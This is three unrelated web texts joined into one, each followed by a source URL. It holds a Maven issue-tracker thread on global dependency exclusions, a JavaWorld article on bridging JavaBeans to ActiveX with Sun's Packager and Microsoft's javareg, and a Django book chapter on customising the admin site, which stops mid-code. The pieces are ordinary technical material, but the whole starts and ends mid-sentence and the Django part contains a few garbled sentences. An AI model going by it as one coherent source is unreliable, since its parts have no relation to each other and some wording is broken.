suggested in my last comment? Or do you want to do it differently? Please let me know your suggestions and I will try to implement it. Thanks, Jean-Noël Might be that this is already commented, but here's what we need: - Possibility to exclude transitive dependencies using groupId only (meaning all artifacts/versions within that groupId) - Another nice feature would be, a global pom setting that says: "Use transitive dependencies during compile, but not during packaging". Meaning: You can quickly get up developing code (getting all dependencies needed), but when bundling ex a war file, exclude trans. dep. because you want to control the war content. - Also a nice feature would be to turn off transitive dependencies all together I think there's some allusion to a version 5 of pom.xml, which would be interesting. If nothing else, I certainly support the idea of <scope>exclude</scope>. It is time that we got a release that solved some of the longest standing issues and gave us an opportunity to move forwards rather than to live with backwards compatibility that kills us. I love the idea of allowing a switch to change compile -> compile = compile to what was originally intended, that compile -> compile = runtime This would make many builds far more robust to changes in child dependencies. @Morten: I think that "Include transitive dependencies during packaging" should rather be a feature of war, shade and other packaging plugins. There must already be enough information available to plugins through project meta-data, because maven-assembly-plugin has already got an option to filter out transitive dependencies. @Neale: I agree that it would make a lot of sense to promote transitive compile dependencies into runtime scope, but unfortunately that does not solve the problem of polluting the runtime scope with unwanted transitive dependencies. More flexible exclusion mechanism using patterns or some other configuration is still needed. compile -> compile = runtime This would make many builds far more robust to changes in child dependencies. You can simulate this if you use a global master pom. Then you would not only set the version in the depMgmt, but also the scope of all deps to runtime. That will have the same effect, you would have to set compile scope explicitly everywhere in our project. Been there and reverted it ... you'll see yourself, if you try Thanks for the feedback guys. My use case is as simple as that: I want to exclude some transitive dependencies accross all dependencies to allow compiling GWT code. Otherwise I get the error "the input line is too long" on windows. So far we have to exclude the same transitive dependencies for all the dependencies where they exist which can be as many as 8 today. Not nice :-/, hence why I am looking at this solution. A simple global exclude would solve the problem for us. It looks to me the code I did is good enough to handle my use case. I just need to know how the Maven team wants this configuration to look in the pom.xml file and then I can look at doing it. Hello, I gave another go at this issue. This time, I specified the exclusions in the pom.xml file by following this approach: <project> <dependencies> ... </dependencies> ... <exclusions> <exclusion> <groupId>com.mycompany</groupId> <artifactId>myproject</artifactId> </exclusion> </exclusions> ... </project> Please let me know what you think of these patches. Thanks, Jean-Noel +1 to this, though i'm not sure if maven is still being actively developed ? JvZ - why not Maven 3.1 for this? It's highly voted and there's a patch, yet no comment on the patch has been made. That's not good for goodwill A real world problem needs a solution. Is there any real intention to adress this? 8 years, 155 votes, 5 duplicates and 4 patches later I wonder: should I be proud or embarrassed that the issue is still unresolved? i just lost 2 days peppering my poms with individual exclusions. can we please have this feature? It has been always a problem for anyone who hates common loggings Really, this is a MUST-HAVE. When using log4j2 there is a Jakarta Commons Logging Bridge that has the full commons-logging.jar as a dependency. That means the global exclusion needs to make sure that I can exclude all transitive deps to "commons-logging", except for the log4j-jcl.jar. Maybe like this: <project> <exclusions> <exclusion> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> </exclusion> </exclusions> </project> and for the log4j-jcl dependency: <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-jcl</artifactId> <version>${log4j2.version}</version> <inclusions> <!-- ... --> </inclusions> </dependency> Starting with Maven 3.2.1 there is simply a solution which excludes all transitve dependencies: <dependencies> <dependency> <groupId>org.apache.maven</groupId> <artifactId>maven-embedder</artifactId> <version>3.1.0</version> <exclusions> <exclusion> <groupId>*</groupId> <artifactId>*</artifactId> </exclusion> </exclusions> </dependency> ... </dependencies> maven-embedder,it's aim to embeded maven?,where can i find some more details about this maven plugin.here too little infos. Starting with Maven 3.4, you can manage dependencies to optional in dependency management. That is the same as excluding them globally when not explicitly declared as a direct dependency. This has been revert for 3.4 and got postponed for 3.5. Looking at the original ask, the correct solution is, rather that global exclusions, the ability to say X supplies Y as in something along the lines of either MNG-177 or MNG-5652 IMHO a global excludes both complicates things for users as well as acting as a siren's call... applying exclusions is really an indication that somebody has done something wrong. We should not remove the ability to apply one-off per dependency fix-ups... individual projects can and will make mistakes from time to time... but a global exclusion, to my mind, indicates that the project that declares the global exclusion has made a mistake... they should just fix the mistake, rather than continue to propagate it further Not targetted for 3.5.0 Also, people are actually deploying high availability maven repositories containing only "99-version-does-not-exist" of empty artifacts ( ) just to get around this problem. This shows how badly this is needed.. From MNG-2031: Transitive dependencies are cool, however, the limitations are very difficult to work around. One cool feature would be to allow disabling transitive dependencies in the following ways:
https://issues.apache.org/jira/browse/MNG-1977
CC-MAIN-2017-09
en
refinedweb
Life's tough when you're trying to develop reusable software components. Often, the development tools your customers use dictate which development tools and architecture you choose. As a component developer, you may be attracted to the simple, object-oriented architecture of JavaBeans. However, there are a lot of Visual Basic (Visual C++, Delphi, etc.) developers who want ActiveX controls, not JavaBeans. Are you ready to forfeit these potential customers? Wouldn't it be great if you could write your components in Java and make them available to ActiveX control users? Well, you can. And in many cases, you won't even have to modify your existing Java code! The right tool for the job: Choosing between the Sun and Microsoft tools.) Sun's JavaBeans Bridge for ActiveX 1.0 The first tool we'll examine is the Packager application, which comes as part of Sun's JavaBeans Bridge for ActiveX. Packager allows you to: - Generate Windows-friendly event interfaces - Generate standard, easy-to-use registry files - Require separate jar files for ActiveX users: public class GameEvent extends java.util.EventObject { public GameEvent(Object source, int level, int numClicks, boolean won) {...} } If you don't select the uncrack option, a Visual Basic event handler method might look something like this: Private Sub Blackout1_mouseClicked(ByVal GameEvent1 As Object) ' Get the number of clicks from the event ' using the IDispatch interface Clicks.Caption = GameEvent1.getNumClicks End Sub Notice that the method receives the GameEvent instance as a generic Visual Basic Object type. Because Visual Basic supports late binding, the GameEvent.getNumClicks method can be invoked on the generic object. Behind the scenes, this call is passed to the Java object. (More on how this works later.) However, Visual Basic's name-completion capabilities will be unavailable to the user and invocation errors won't be detected until runtime. Event handlers for uncracked events receive the event as a list of its component parts. Here's a handler, which has been uncracked, for the same event: Private Sub Blackout1_mouseClicked(ByVal numClicks As Long, ByVal Level As Long, ByVal won As Boolean, ByVal source As Object) Clicks.Caption = numClicks End Sub Uncracking your events has two ramifications. First, because the event object is no longer passed into the event handler, any custom methods you've added to your event will be unavailable. Second, because event handler receives copies of the data in the event, it predicates that your event's fields are immutable. After you select all the generation parameters, click on the Start Generation button to put Packager to work. Packager first generates adapter classes and adds them to your jar file. At this point your jar can only be used in an environment where the Sun ActiveX bridge classes (in the sun.beans.ole package) are available. If you want to distribute your JavaBeans to environments that will not have these classes, you'll need to ship a copy of the jar file that hasn't been run through the Packager. Next, Packager generates type library (tlb) and registry (reg) files for the JavaBean. The registry file contains information about the ActiveX control, including the location of its type library and jar files. This file is loaded into the registry so that ActiveX client applications can access the control. Users of your controls can include the registry file with their applications and/or incorporate its contents in their application installation scripts. The type library contains information about the COM (more on COM later) interface(s) supported by the control. Applications use this file to provide API information to the control user. Packager preserves your Java method parameter names, making the controls easier to use (Microsoft's javareg names parameters as Parameter0, Parameter1, etcetera). Although this file is binary, you can examine its contents with the OLE-COM Object Viewer that comes with Visual C++. You'll notice that this file looks a lot like any other type library. There's really nothing Java-specific about it. Users of your control won't necessarily know they're using a JavaBean. It will appear along with the other ActiveX controls and have almost all the same characteristics found in controls written in other languages like Visual C++. It will, however, have one nifty addition. If you've gone to the trouble to write a customizer for your JavaBean, it will be available as a custom property page in ActiveX environments. When a JavaBean/ActiveX control is loaded into a development tool or application, the registry information instructs the system to load the Java virtual machine as a dynamically-linked library (assuming it hasn't already been loaded) and create an instance of your JavaBean class. Subsequent method calls and events are passed between the application and the control via the adapter classes generated by the Packager. When deployed, JavaBeans that have been bridged with the Packager will require the following items to be installed on your customer's machine: - The Java Development Kit (JDK) or Java Runtime Environment (JRE), version 1.1 or higher - The JavaBeans Bridge for ActiveX or JavaBeans Bridge for ActiveX Runtime - The jar file you ran through the Packager - The registry and type library files that were generated by the Packager Note that the registry file contains some explicit directory information. You may need to modify the values to match the installation directories used on the customer's machine. Do this before the file is loaded into the registry. Microsoft's Software Developer's Kit (SDK) for Java 3.0 Next we'll examine Microsoft's tool, javareg. Although javareg performs the same task as Sun's Packager, its approach is somewhat different. The javareg tool allows you to: - Register most Java classes a COM objects - Support low-level COM/DCOM as well as ActiveX - Require a special registration tool to be shipped with your controls We'll examine each of these capabilities in detail in the following discussion. javareg comes as part of Microsoft's SDK for Java. In addition to registering JavaBeans as ActiveX controls, it provides two capabilities currently unavailable from Sun's tools. First, it allows Java classes to be registered as standard COM/DCOM objects, as well as ActiveX controls. Second, it can register almost any Java class, regardless of whether or not it's a JavaBean. This supports low-level COM integration and also facilitates the implementation of user-defined types as JavaBean method parameters and return types. In addition, the Microsoft SDK includes a package (com.ms.com) of classes that provide enhanced COM capabilities, including the ability to use COM objects written in other languages within Java code. If you're looking to integrate closely with COM, these capabilities will probably compel you to use javareg and the other tools in the SDK. This article, however, will focus on the ActiveX control registration, and leave the low-level COM discussion for another time. Prior to using javareg, you should make sure that your JavaBean classes are accessible within the classpath. Next, you invoke javareg, from the command line, with parameters that specify how your JavaBean is to be registered: javareg /register /control /codebase:. /class:blackout.Blackout /clsid:{3BFE1750-0C76-11d2-B0FA-00A024BA2CD9} /typelib:Blackout.tlb In this example, the command-line arguments indicate that we're registering an ActiveX control from the blackout.Blackout Java class, and that the files can be located in the current directory. The CLSID parameter specifies a globally unique identifier (GUID) for the ActiveX control being registered. Most applications use the CLSID (rather than the name) to retrieve information about an ActiveX control. For this reason, control developers rarely change a control's CLSID. Providing the CLSID parameter allows you to ensure the same value is used any time the control is registered. If you don't specify the CLSID on the command line, javareg will create a new CLSID for the JavaBean. (Note: You can have explicit control of the CLSID with Sun's tools by editing the CLSID entry of the reg file generated by the Packager.) Unlike the Sun tool, javareg doesn't generate adapter classes to implement bridging. Instead, Microsoft built the bridging smarts directly into its Java virtual machine. This eliminates the need to maintain a separate jar file for ActiveX installations. The javareg tool also bypasses generation of a registry file by directly updating the registry. This is unfortunate, as it limits your access to the information being inserted into the registry. For example, while javareg does allow you to set the CLSID for your control, there are other registry identifiers, including one for the type library, that it generates every time it's run. Because Visual Basic applications use the type library identifier, the Visual Basic developer must repair applications that use a bridged control each time it is re-registered, even though the control itself may not have changed. In addition, customers of your controls will also need to incorporate javareg in the installation scripts for their applications. The good news is that many of the registry entries are boilerplate, so with a little effort you can solve these problems by generating your own reg file. However, it would be much nicer if the tool did this for you! The javareg tool does, however, generate a type library. If you examine this file and the one generated by the Sun tool, you'll find the two are nearly identical. Inside the type library you'll find declarations for the public interface of your JavaBean, as well as the interface for objects that will receive events generated by your JavaBean. Both javareg and Sun's Packager will generate this information from your BeanInfo class if you created one for your JavaBean. Otherwise, introspection is used to generate the type library information. Although javareg differs from Sun's Packager in the way it bridges your JavaBeans, usage of the controls is the same. The controls appear as normal ActiveX controls. When they're loaded into an application, the Microsoft Java VM is also loaded and an instance of the JavaBean is created. When deployed, JavaBeans that have been bridged with javareg will require the following items to be installed on your customer's machine: - A recent version of the Microsoft Java virtual machine (msjava.dll) - The javareg.exe program from the Microsoft Java SDK - Your JavaBean and its supporting files javareg will need to be run on the target machine. You may want to ship registration scripts and the type libraries, to ensure that controls are generated identically for all customers.
http://www.javaworld.com/article/2076750/client-side-java/master-of-disguises--making-javabeans-look-like-activex-controls.html
CC-MAIN-2014-42
en
refinedweb
For a certain class of Web sites, an admin interface is an essential part of the infrastructure. This is a Web-based interface, limited to trusted site administrators, that enables the adding, editing and deletion of site content. Some common examples: the interface you use to post to your blog, the backend site managers use to moderate user-generated comments, the tool your clients use to update the press releases on the Web site you built for them.. The feature works by reading metadata in your model to provide a powerful and production-ready interface that site administrators can start using immediately. Here, we discuss how to activate, use, and customize this feature. Note that we recommend reading this chapter even if you don’t intend to use the Django admin site, because we introduce a few concepts that apply to all of Django, regardless of admin-site usage. Django’s automatic admin is part of a larger suite of Django functionality called django.contrib – the part of the Django codebase that contains various useful add-ons to the core framework. You can think of django.contrib as Django’s equivalent of the Python standard library – optional, de facto implementations of common patterns. They’re bundled with Django so that you don’t have to reinvent the wheel in your own applications. The admin site is the first part of django.contrib that we’re covering in this book; technically, it’s called django.contrib.admin. Other available features in django.contrib include a user authentication system (django.contrib.auth), support for anonymous sessions (django.contrib.sessions) and even a system for user comments (django.contrib.comments). You’ll get to know the various django.contrib features as you become a Django expert, and we’ll spend some more time discussing them in Chapter 16. For now, just know that Django ships with many nice add-ons, and django.contrib is generally where they live. The Django admin site is entirely optional, because only certain types of sites need this functionality. That means you’ll need to take a few steps to activate it in your project. First, make a few changes to your settings file: Second, run python manage.py syncdb. This step will install the extra database tables that the admin interface uses. The first time you run syncdb with 'django.contrib.auth' in INSTALLED_APPS, you’ll be asked about creating a superuser. If you don’t do this, you’ll need to run python manage.py createsuperuser separately to create an admin user account; otherwise, you won’t be able to log in to the admin site. (Potential gotcha: the python manage.py createsuperuser command is only available if 'django.contrib.auth' is in your INSTALLED_APPS.) Third, add the admin site to your URLconf (in urls.py, remember). By default, the urls.py generated by django-admin.py startproject contains commented-out code for the Django admin, and all you have to do is uncomment it. For the record, here are the bits you need to make sure are in there: # Include these import statements... from django.contrib import admin admin.autodiscover() # And include this URLpattern... urlpatterns = patterns('', # ... (r'^admin/', include(admin.site.urls)), # ... ) With that bit of configuration out of the way, now you can see the Django admin site in action. Just run the development server (python manage.py runserver, as in previous chapters) and visit in your Web browser. The admin site is designed to be used by nontechnical users, and as such it should be pretty self-explanatory. Nevertheless, we’ll give you a quick walkthrough of the basic features. The first thing you’ll see is a login screen, as shown in Figure 6-1. Figure 6-1. Django’s login screen Log in with the username and password you set up when you added your superuser. If you’re unable to log in, make sure you’ve actually created a superuser – try running python manage.py createsuperuser. Once you’re logged in, the first thing you’ll see will be the admin home page. This page lists all the available types of data that can be edited on the admin site. At this point, because we haven’t activated any of our own models yet, the list is sparse: it includes only Groups and Users, which are the two default admin-editable models. Figure 6-2. The Django admin home page Each type of data in the Django admin site has a change list and an edit form. Change lists show you all the available objects in the database, and edit forms let you add, change or delete particular records in your database. Other languages If your primary language is not English and your Web browser is configured to prefer a language other than English, you can make a quick change to see whether the Django admin site has been translated into your language. Just add 'django.middleware.locale.LocaleMiddleware' to your MIDDLEWARE_CLASSES setting, making sure it appears after 'django.contrib.sessions.middleware.SessionMiddleware'. When you’ve done that, reload the admin index page. If a translation for your language is available, then the various parts of the interface – from the “Change password” and “Log out” links at the top of the page, to the “Groups” and “Users” links in the middle – will appear in your language instead of English. Django ships with translations for dozens of languages. For much more on Django’s internationalization features, see Chapter 19. Click the “Change” link in the “Users” row to load the change list page for users. Figure 6-3. The user change list page This page displays all users in the database; you can think of it as a prettied-up Web version of a SELECT * FROM auth_user; SQL query. If you’re following along with our ongoing example, you’ll only see one user here, assuming you’ve added only one, but once you have more users, you’ll probably find the filtering, sorting and searching options useful. Filtering options are at right, sorting is available by clicking a column header, and the search box at the top lets you search by username. Click the username of the user you created, and you’ll see the edit form for that user. Figure 6-4. The user edit form This page lets you change the attributes of the user, like the first/last names and various permissions. (Note that to change a user’s password, you should click “change password form” under the password field rather than editing the hashed code.) Another thing to note here is that fields of different types get different widgets – for example, date/time fields have calendar controls, boolean fields have checkboxes, character fields have simple text input fields. You can delete a record by clicking the delete button at the bottom left of its edit form. That’ll take you to a confirmation page, which, in some cases, will display any dependent objects that will be deleted, too. (For example, if you delete a publisher, any book with that publisher will be deleted, too!) You can add a record by clicking “Add” in the appropriate column of the admin home page. This will give you an empty version of the edit page, ready for you to fill out. You’ll also notice that the admin interface also handles input validation for you. Try leaving a required field blank or putting an invalid date into a date field, and you’ll see those errors when you try to save, as shown in Figure 6-5. Figure 6-5. An edit form displaying errors When you edit an existing object, you’ll notice a History link in the upper-right corner of the window. Every change made through the admin interface is logged, and you can examine this log by clicking the History link (see Figure 6-6). Figure 6-6. An object history page There’s one crucial part we haven’t done yet. Let’s add our own models to the admin site, so we can add, change and delete objects in our custom database tables using this nice interface. We’ll continue the books example from Chapter 5, where we defined three models: Publisher, Author and Book. Within the books directory (mysite/books), create a file called admin.py, and type in the following lines of code: from django.contrib import admin from mysite.books.models import Publisher, Author, Book admin.site.register(Publisher) admin.site.register(Author) admin.site.register(Book) This code tells the Django admin site to offer an interface for each of these models. Once you’ve done this, go to your admin home page in your Web browser (), and you should see a “Books” section with links for Authors, Books and Publishers. (You might have to stop and start the runserver for the changes to take effect.) You now have a fully functional admin interface for each of those three models. That was easy! Take some time to add and change records, to populate your database with some data. If you followed Chapter 5’s examples of creating Publisher objects (and you didn’t delete them), you’ll already see those records on the publisher change list page. One feature worth mentioning here is the admin site’s handling of foreign keys and many-to-many relationships, both of which appear in the Book model. As a reminder, here’s what the Book model looks like: class Book(models.Model): title = models.CharField(max_length=100) authors = models.ManyToManyField(Author) publisher = models.ForeignKey(Publisher) publication_date = models.DateField() def __unicode__(self): return self.title On the Django admin site’s “Add book” page (), the publisher (a ForeignKey) is represented by a select box, and the authors field (a ManyToManyField) is represented by a multiple-select box. Both fields sit next to a green plus sign icon that lets you add related records of that type. For example, if you click the green plus sign next to the “Publisher” field, you’ll get a pop-up window that lets you add a publisher. After you successfully create the publisher in the pop-up, the “Add book” form will be updated with the newly created publisher. Slick. Behind the scenes, how does the admin site work? It’s pretty straightforward. When Django loads your URLconf from urls.py at server startup, it executes the admin.autodiscover() statement that we added as part of activating the admin. This function iterates over your INSTALLED_APPS setting and looks for a file called admin.py in each installed app. If an admin.py exists in a given app, it executes the code in that file. In the admin.py in our books app, each call to admin.site.register() simply registers the given model with the admin. The admin site will only display an edit/change interface for models that have been explicitly registered. The app django.contrib.auth includes its own admin.py, which is why Users and Groups showed up automatically in the admin. Other django.contrib apps, such as django.contrib.redirects, also add themselves to the admin, as do many third-party Django applications you might download from the Web. Beyond that, the Django admin site is just a Django application, with its own models, templates, views and URLpatterns. You add it to your application by hooking it into your URLconf, just as you hook in your own views. You can inspect its templates, views and URLpatterns by poking around in django/contrib/admin in your copy of the Django codebase – but don’t be tempted to change anything directly in there, as there are plenty of hooks for you to customize the way the admin site works. (If you do decide to poke around the Django admin application, keep in mind it does some rather complicated things in reading metadata about models, so it would probably take a good amount of time to read and understand the code.) After you play around with the admin site for a while, you’ll probably notice a limitation – the edit forms require every field to be filled out, whereas in many cases you’d want certain fields to be optional. Let’s say, for example, that we want our Author model’s email field to be optional – that is, a blank string should be allowed. In the real world, you might not have an e-mail address on file for every author. To specify that the email field is optional, edit the Author model (which, as you’ll recall from Chapter 5, lives in mysite/books/models.py). Simply add blank=True to the email field, like so: class Author(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=40) email = models.EmailField(blank=True) This tells Django that a blank value is indeed allowed for authors’ e-mail addresses. By default, all fields have blank=False, which means blank values are not allowed. There’s something interesting happening here. Until now, with the exception of the __unicode__() method, our models have served as definitions of our database tables – Pythonic expressions of SQL CREATE TABLE statements, essentially. In adding blank=True, we have begun expanding our model beyond a simple definition of what the database table looks like. Now, our model class is starting to become a richer collection of knowledge about what Author objects are and what they can do. Not only is the email field represented by a VARCHAR column in the database; it’s also an optional field in contexts such as the Django admin site. Once you’ve added that blank=True, reload the “Add author” edit form (), and you’ll notice the field’s label – “Email” – is no longer bolded. This signifies it’s not a required field. You can now add authors without needing to provide e-mail addresses; you won’t get the loud red “This field is required” message anymore, if the field is submitted empty. A common gotcha related to blank=True has to do with date and numeric fields, but it requires a fair amount of background explanation. SQL has its own way of specifying blank values – a special value called NULL. NULL could mean “unknown,” or “invalid,” or some other application-specific meaning. In SQL, a value of NULL is different than an empty string, just as the special Python object None is different than an empty Python string (""). This means it’s possible for a particular character field (e.g., a VARCHAR column) to contain both NULL values and empty string values. This can cause unwanted ambiguity and confusion: “Why does this record have a NULL but this other one has an empty string? Is there a difference, or was the data just entered inconsistently?” And: “How do I get all the records that have a blank value – should I look for both NULL records and empty strings, or do I only select the ones with empty strings?” To help avoid such ambiguity, Django’s automatically generated CREATE TABLE statements (which were covered in Chapter 5) add an explicit NOT NULL to each column definition. For example, here’s the generated statement for our Author model, from Chapter 5: CREATE TABLE "books_author" ( "id" serial NOT NULL PRIMARY KEY, "first_name" varchar(30) NOT NULL, "last_name" varchar(40) NOT NULL, "email" varchar(75) NOT NULL ) ; In most cases, this default behavior is optimal for your application and will save you from data-inconsistency headaches. And it works nicely with the rest of Django, such as the Django admin site, which inserts an empty string (not a NULL value) when you leave a character field blank. But there’s an exception with database column types that do not accept empty strings as valid values – such as dates, times and numbers. If you try to insert an empty string into a date or integer column, you’ll likely get a database error, depending on which database you’re using. (PostgreSQL, which is strict, will raise an exception here; MySQL might accept it or might not, depending on the version you’re using, the time of day and the phase of the moon.) In this case, NULL is the only way to specify an empty value. In Django models, you can specify that NULL is allowed by adding null=True to a field. So that’s a long way of saying this: if you want to allow blank values in a date field (e.g., DateField, TimeField, DateTimeField) or numeric field (e.g., IntegerField, DecimalField, FloatField), you’ll need to use both null=True and blank=True. For sake of example, let’s change our Book model to allow a blank publication_date. Here’s the revised code: class Book(models.Model): title = models.CharField(max_length=100) authors = models.ManyToManyField(Author) publisher = models.ForeignKey(Publisher) publication_date = models.DateField(blank=True, null=True). Recall that you can use manage.py dbshell to enter your database server’s shell. Here’s how to remove the NOT NULL in this particular case: ALTER TABLE books_book ALTER COLUMN publication_date DROP NOT NULL; (Note that this SQL syntax is specific to PostgreSQL.) We’ll cover schema changes in more depth in Chapter 10. Bringing this back to the admin site, now the “Add book” edit form should allow for empty publication date values. On the admin site’s edit forms, each field’s label is generated from its model field name. The algorithm is simple: Django just replaces underscores with spaces and capitalizes the first character, so, for example, the Book model’s publication_date field has the label “Publication date.” However, field names don’t always lend themselves to nice admin field labels, so in some cases you might want to customize a label. You can do this by specifying verbose_name in the appropriate model field. For example, here’s how we can change the label of the Author.email field to “e-mail,” with a hyphen: class Author(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=40) email = models.EmailField(blank=True, verbose_name='e-mail') Make that change and reload the server, and you should see the field’s new label on the author edit form. Note that you shouldn’t capitalize the first letter of a verbose_name unless it should always be capitalized (e.g., "USA state"). Django will automatically capitalize it when it needs to, and it will use the exact verbose_name value in other places that don’t require capitalization. Finally, note that you can pass the verbose_name as a positional argument, for a slightly more compact syntax. This example is equivalent to the previous one: class Author(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=40) email = models.EmailField('e-mail', blank=True) This won’t work with ManyToManyField or ForeignKey fields, though, because they require the first argument to be a model class. In those cases, specifying verbose_name explicitly is the way to go. The changes we’ve made so far – blank=True, null=True and verbose_name – are really model-level changes, not admin-level changes. That is, these changes are fundamentally a part of the model and just so happen to be used by the admin site; there’s nothing admin-specific about them. Beyond these, the Django admin site offers a wealth of options that let you customize how the admin site works for a particular model. Such options live in ModelAdmin classes, which are classes that contain configuration for a specific model in a specific admin site instance. Let’s dive into admin customization by specifying the fields that are displayed on the change list for our Author model. By default, the change list displays the result of __unicode__() for each object. In Chapter 5, we defined the __unicode__() method for Author objects to display the first name and last name together: class Author(models.Model): first_name = models.CharField(max_length=30) last_name = models.CharField(max_length=40) email = models.EmailField(blank=True, verbose_name='e-mail') def __unicode__(self): return u'%s %s' % (self.first_name, self.last_name) As a result, the change list for Author objects displays each other’s first name and last name together, as you can see in Figure 6-7. Figure 6-7. The author change list page We can improve on this default behavior by adding a few other fields to the change list display. It’d be handy, for example, to see each author’s e-mail address in this list, and it’d be nice to be able to sort by first and last name. To make this happen, we’ll define a ModelAdmin class for the Author model. This class is the key to customizing the admin, and one of the most basic things it lets you do is specify the list of fields to display on change list pages. Edit admin.py to make these changes: from django.contrib import admin from mysite.books.models import Publisher, Author, Book class AuthorAdmin(admin.ModelAdmin): list_display = ('first_name', 'last_name', 'email') admin.site.register(Publisher) admin.site.register(Author, AuthorAdmin) admin.site.register(Book) Here’s what we’ve done: We created the class AuthorAdmin. This class, which subclasses django.contrib.admin.ModelAdmin, holds custom configuration for a specific admin model. We’ve only specified one customization – list_display, which is set to a tuple of field names to display on the change list page. These field names must exist in the model, of course. We altered the admin.site.register() call to add AuthorAdmin after Author. You can read this as: “Register the Author model with the AuthorAdmin options.” The admin.site.register() function takes a ModelAdmin subclass as an optional second argument. If you don’t specify a second argument (as is the case for Publisher and Book), Django will use the default admin options for that model. With that tweak made, reload the author change list page, and you’ll see it’s now displaying three columns – the first name, last name and e-mail address. In addition, each of those columns is sortable by clicking on the column header. (See Figure 6-8.) Figure 6-8. The author change list page after list_display Next, let’s add a simple search bar. Add search_fields to the AuthorAdmin, like so: class AuthorAdmin(admin.ModelAdmin): list_display = ('first_name', 'last_name', 'email') search_fields = ('first_name', 'last_name') Reload the page in your browser, and you should see a search bar at the top. (See Figure 6-9.) We’ve just told the admin change list page to include a search bar that searches against the first_name and last_name fields. As a user might expect, this is case-insensitive and searches both fields, so searching for the string "bar" would find both an author with the first name Barney and an author with the last name Hobarson. Figure 6-9. The author change list page after search_fields Next, let’s add some date filters to our Book model’s change list page: from django.contrib import admin from mysite.books.models import Publisher, Author, Book class AuthorAdmin(admin.ModelAdmin): list_display = ('first_name', 'last_name', 'email') search_fields = ('first_name', 'last_name') class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) admin.site.register(Publisher) admin.site.register(Author, AuthorAdmin) admin.site.register(Book, BookAdmin) Here, because we’re dealing with a different set of options, we created a separate ModelAdmin class – BookAdmin. First, we defined a list_display just to make the change list look a bit nicer. Then, we used list_filter, which is set to a tuple of fields to use to create filters along the right side of the change list page. For date fields, Django provides shortcuts to filter the list to “Today,” “Past 7 days,” “This month” and “This year” – shortcuts that Django’s developers have found hit the common cases for filtering by date. Figure 6-10 shows what that looks like. Figure 6-10. The book change list page after list_filter list_filter also works on fields of other types, not just DateField. (Try it with BooleanField and ForeignKey fields, for example.) The filters show up as long as there are at least 2 values to choose from. Another way to offer date filters is to use the date_hierarchy admin option, like this: class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' With this in place, the change list page gets a date drill-down navigation bar at the top of the list, as shown in Figure 6-11. It starts with a list of available years, then drills down into months and individual days. Figure 6-11. The book change list page after date_hierarchy Note that date_hierarchy takes a string, not a tuple, because only one date field can be used to make the hierarchy. Finally, let’s change the default ordering so that books on the change list page are always ordered descending by their publication date. By default, the change list orders objects according to their model’s ordering within class Meta (which we covered in Chapter 5) – but you haven’t specified this ordering value, then the ordering is undefined. class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' ordering = ('-publication_date',) This admin ordering option works exactly as the ordering in models’ class Meta, except that it only uses the first field name in the list. Just pass a list or tuple of field names, and add a minus sign to a field to use descending sort order. Reload the book change list to see this in action. Note that the “Publication date” header now includes a small arrow that indicates which way the records are sorted. (See Figure 6-12.) Figure 6-12. The book change list page after ordering We’ve covered the main change list options here. Using these options, you can make a very powerful, production-ready data-editing interface with only a few lines of code. Just as the change list can be customized, edit forms can be customized in many ways. First, let’s customize the way fields are ordered. By default, the order of fields in an edit form corresponds to the order they’re defined in the model. We can change that using the fields option in our ModelAdmin subclass: class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' ordering = ('-publication_date',) fields = ('title', 'authors', 'publisher', 'publication_date') After this change, the edit form for books will use the given ordering for fields. It’s slightly more natural to have the authors after the book title. Of course, the field order should depend on your data-entry workflow. Every form is different. Another useful thing the fields option lets you do is to exclude certain fields from being edited entirely. Just leave out the field(s) you want to exclude. You might use this if your admin users are only trusted to edit a certain segment of your data, or if part of your fields are changed by some outside, automated process. For example, in our book database, we could hide the publication_date field from being editable: class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' ordering = ('-publication_date',) fields = ('title', 'authors', 'publisher') As a result, the edit form for books doesn’t offer a way to specify the publication date. This could be useful, say, if you’re an editor who prefers that his authors not push back publication dates. (This is purely a hypothetical example, of course.) When a user uses this incomplete form to add a new book, Django will simply set the publication_date to None – so make sure that field has null=True. Another commonly used edit-form customization has to do with many-to-many fields. As we’ve seen on the edit form for books, the admin site represents each ManyToManyField as a multiple-select boxes, which is the most logical HTML input widget to use – but multiple-select boxes can be difficult to use. If you want to select multiple items, you have to hold down the control key, or command on a Mac, to do so. The admin site helpfully inserts a bit of text that explains this, but, still, it gets unwieldy when your field contains hundreds of options. The admin site’s solution is filter_horizontal. Let’s add that to BookAdmin and see what it does. class BookAdmin(admin.ModelAdmin): list_display = ('title', 'publisher', 'publication_date') list_filter = ('publication_date',) date_hierarchy = 'publication_date' ordering = ('-publication_date',) filter_horizontal = ('authors',) (If you’re following along, note that we’ve also removed the fields option to restore all the fields in the edit form.) Reload the edit form for books, and you’ll see that the “Authors” section now uses a fancy JavaScript filter interface that lets you search through the options dynamically and move specific authors from “Available authors” to the “Chosen authors” box, and vice versa. Figure 6-13. The book edit form after adding filter_horizontal We’d highly recommend using filter_horizontal for any ManyToManyField that has more than 10 items. It’s far easier to use than a simple multiple-select widget. Also, note you can use filter_horizontal for multiple fields – just specify each name in the tuple. ModelAdmin classes also support a filter_vertical option. This works exactly as filter_horizontal, but the resulting JavaScript interface stacks the two boxes vertically instead of horizontally. It’s a matter of personal taste. filter_horizontal and filter_vertical only work on ManyToManyField fields, not ForeignKey fields. By default, the admin site uses simple <select> boxes for ForeignKey fields, but, as for ManyToManyField, sometimes you don’t want to incur the overhead of having to select all the related objects to display in the drop-down. For example, if our book database grows to include thousands of publishers, the “Add book” form could take a while to load, because it would have to load every publisher for display in the <select> box. The way to fix this is to use an option called raw_id_fields. Set this to a tuple of ForeignKey field names, and those fields will be displayed in the admin with a simple text input box (<input type="text">) instead of a <select>. See Figure 6-14. class BookAdmin(admin.ModelAdmin): list_display = 